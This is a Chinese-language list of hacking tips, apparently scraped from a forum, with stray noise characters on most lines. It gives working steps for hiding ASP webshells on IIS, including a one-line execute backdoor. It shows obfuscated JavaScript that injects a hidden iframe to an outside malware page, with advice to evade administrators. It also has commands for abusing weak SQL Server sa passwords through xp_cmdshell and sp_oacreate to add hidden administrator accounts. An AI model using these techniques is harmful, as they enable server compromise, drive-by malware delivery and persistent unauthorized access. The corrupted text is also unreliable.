用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。# i9 ]' t8 C- d1 J
/ j2 _# S: \$ b9 ~
53、隐藏ASP后门的两种方法
: Y1 B" y) W/ L: V1、建立非标准目录:mkdir images..\
, v- D" g9 ?+ t" m4 ?9 `拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% d9 m' W. N5 }
通过web访问ASP木马:http://ip/images../news.asp?action=login
. u8 o; d' @/ D' \! z B6 `如何删除非标准目录:rmdir images..\ /s6 w1 v3 I D% R. R6 K( S% I4 a
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:! x+ _* l w3 I7 Y
mkdir programme.asp% |$ d" h) i' N8 X
新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 s, q& c+ L& e新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件; r# ^8 J. u5 _2 \' Q }0 {' l
attrib +H +S programme.asp/ ^" m/ [* a6 A! R
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
9 X' U% r1 A; W- ]& r
9 v% l0 j3 E( a6 `! B7 c* }54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。: l' E+ F: `$ J; d1 Z$ [
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。! {7 `5 O; [+ i4 W9 g/ h
% w- ]# X7 k, z; ?& }% T- T55、JS隐蔽挂马6 |$ l- m$ U7 n2 e) |" `- N* T
1.6 b! U& \& {5 y6 u6 `: F: v }
var tr4c3="<iframe src=ht";! V7 ~: O( P- s
tr4c3 = tr4c3+"tp:/";
. j) C/ {5 Q7 k0 etr4c3 = tr4c3+"/ww";/ ^0 ], s4 \) V, F z \3 p( a
tr4c3 = tr4c3+"w.tr4";& h) D% x) `% N" C4 e
tr4c3 = tr4c3+"c3.com/inc/m";
! X% N! B4 B7 X* }% I1 htr4c3 = tr4c3+"m.htm style="display:none"></i";
9 _) y* B8 k/ B4 s% q9 [tr4c3 =tr4c3+"frame>'";
+ o+ M4 s% y$ U! e( p9 ^3 sdocument.write(tr4c3);
' ~! L# k: G# q4 g8 w避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 T. s6 h$ D {1 g" K* o
: k1 c: g' u& ?; M- Q, H, j0 ?" X: I/ L2.
) v. Y. p2 @: ^6 H转换进制,然后用EVAL执行。如" W* c8 @' J- N$ @6 m$ F: z7 P
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");/ o$ o G1 {5 W% E4 [
不过这个有点显眼。
x( M. J( X" i" k3 t3.5 `8 v9 b" F( j9 p& [5 O5 {
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
5 ~' n* S% _& j$ [ o4 I* C最后一点,别忘了把文件的时间也修改下。+ }) h5 |1 E3 B
8 k8 M9 I2 \' B* X% [+ o c' r56.3389终端入侵常用DOS命令2 q" D2 ?3 Q% e, Q
taskkill taskkill /PID 1248 /t
9 W4 t% B4 Q" }! ` v) G/ r& P! Z/ x# L' O" r1 ]2 U
tasklist 查进程+ O* }7 [/ u" y& N9 ~' |
$ G) l* F: R6 N- _, e$ t1 l5 t
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
x- c8 Y( ^" Y* E# R' riisreset /reboot
; W- x& _+ ?! Dtsshutdn /reboot /delay:1 重起服务器* C* D1 m9 T4 F# u' ]1 L/ Y
' z- [" n/ o( R! A; ] K4 |3 Llogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
& R1 ]3 T1 p R8 P: B( C+ `
" R6 r2 l3 S: f+ H/ F2 U; Iquery user 查看当前终端用户在线情况
% Z2 }4 }2 L' M/ o5 |/ ^) Q6 ]& a3 ?* ]
要显示有关所有会话使用的进程的信息,请键入:query process *0 o+ S% c; G2 A# j
% q P5 \- D: I0 [7 @
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2& u9 p8 `. f0 l9 _6 h
9 c1 X: R) A: O, W+ u, v4 M) E, {要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER29 f, d( [; u8 F# q
" Z; P5 p; j ]. X0 X# V- x5 [4 ~8 p要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 i7 i. U, `9 s' u% K
$ Z& f5 ~ A6 ?8 x命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 f5 E1 V: y% K! n" _2 E+ h& U p* T/ r% j9 ^
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
, F# P' `2 [# W0 S
! H4 u4 j4 @0 y: W命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
$ u2 B) ] ^4 T& C" L) ` T1 g
0 E. l( D- _0 U命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 w2 f: G7 r7 n
+ \) t) w/ r, k
56、在地址栏或按Ctrl+O,输入:5 c$ @' _/ j6 ?0 H3 k0 I
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;. A+ w6 w" a3 m; H
1 D; ]; v. H* O$ F8 f源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。% J; U8 {& Q# `9 Y0 L% j
2 Q; V& ~7 m& ?( Z& j2 V
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
1 M# p* h, w& {. T* f用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 V! Y, G/ w% e7 C$ d) S- o8 E- [
' s& V( ~. G6 R4 e. |/ |$ N0 }58、 sa弱口令相关命令( c: j+ l2 s8 T' V8 Y6 o8 w) M$ b/ W
8 P$ ?5 h4 a8 Z& {一.更改sa口令方法: u# O. Y4 q- ~" G
用sql综合利用工具连接后,执行命令:* {+ r3 k1 u5 e( r( e4 n; H
exec sp_password NULL,'20001001','sa'3 y3 i9 N; M x5 P$ }/ W5 d% R
(提示:慎用!)
, v' W, B3 H8 b; h3 n4 b+ u$ a v T. |0 ]
二.简单修补sa弱口令.
1 F* u+ ~3 W! l6 e. `9 s- c
( u' a7 P8 ]4 }7 _/ W# u方法1:查询分离器连接后执行:2 ]% K1 v% Z1 ]' b& }- [) k% g
if exists (select * from
: O2 N. K; _1 n1 p8 {1 ~& d6 m2 P. T, Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: |# t. t3 ^7 ?9 e' A) ~2 Z! w( v
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 f/ e) J. I% C9 r$ j& o' B' b0 K) i# t) k3 r
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
e7 ^' p' j. z2 g7 @9 T+ W+ A n# |; `$ v+ Y0 @8 X
GO9 \9 I7 ~* ~) B3 X" A: |9 z
. X" L6 k- w' z/ p* E8 A1 s
然后按F5键命令执行完毕
7 \- s# M6 K- G& j7 z6 R( e7 d1 v4 J$ }- C1 D2 s$ o
方法2:查询分离器连接后2 G/ O, B$ M! @
第一步执行:use master# Y6 j8 J2 B2 w! M! o( Q6 I
第二步执行:sp_dropextendedproc 'xp_cmdshell'
0 c* @6 o: i: \6 u. A. c然后按F5键命令执行完毕
) m% D! P+ g; @. g. C- [
% [- g, Z2 F1 W" a
! \- [4 n6 @- t7 I4 ~+ S* n三.常见情况恢复执行xp_cmdshell.' E' l, l+ ~1 Q" I9 N9 X
3 e( |& z) q. Y4 |/ [6 Q" e* Y; m' L# E0 u" I
1 未能找到存储过程'master..xpcmdshell'.' J# O: u2 L j+ j4 F
恢复方法:查询分离器连接后,
- \ v6 m5 ^" _, J9 z3 O# Q6 z第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( v# x" r; b0 x+ B第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ ~3 m9 K- r9 o' S1 p/ w
然后按F5键命令执行完毕7 H& J/ P8 w! p1 Z
. r7 g& u7 f. @2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): b4 O0 ?2 N) C" m8 J) H
恢复方法:查询分离器连接后,; P# n4 a& ]8 W* X3 ?
第一步执行:sp_dropextendedproc "xp_cmdshell"
. O! a$ O$ ^, o$ o N第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') ?( Y+ I$ C3 T- ~7 i5 u
然后按F5键命令执行完毕
9 v! X- K9 @- d1 p1 @# O# m7 Z5 n/ o5 k% s& | K0 Y+ ]; d7 j" Z
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。); }6 j6 d: x- j0 c! V
恢复方法:查询分离器连接后,
6 {7 q% g5 V+ M8 w, M$ K! Q第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; _4 F- S. z# K: R7 y第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' , ]7 e t/ x$ d* u0 o( j
然后按F5键命令执行完毕
; h& H3 [9 l6 s
7 v6 ?. r8 G" \0 Z四.终极方法.3 T; h' F% \" @% I
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
8 [: j+ N7 x) ?3 h8 k; I6 `# v查询分离器连接后,. B3 q( `, Y+ S6 ?+ j3 G" `
2000servser系统:/ D7 ]! Z3 D; N8 h) E5 a0 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
4 c' B j* r' e
) T7 Q/ u. e1 }$ H# xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add') m$ a; m; v# c% m( L
% m8 K$ E/ @! ^4 X Kxp或2003server系统:
+ E+ z1 S) l K5 m4 d, A. y& j' ~0 M6 L8 r' n% C2 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
' ^ B7 G+ V! r( |7 ]3 ~' s j6 ], ]/ G" \9 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) }2 D. p2 S7 G/ l |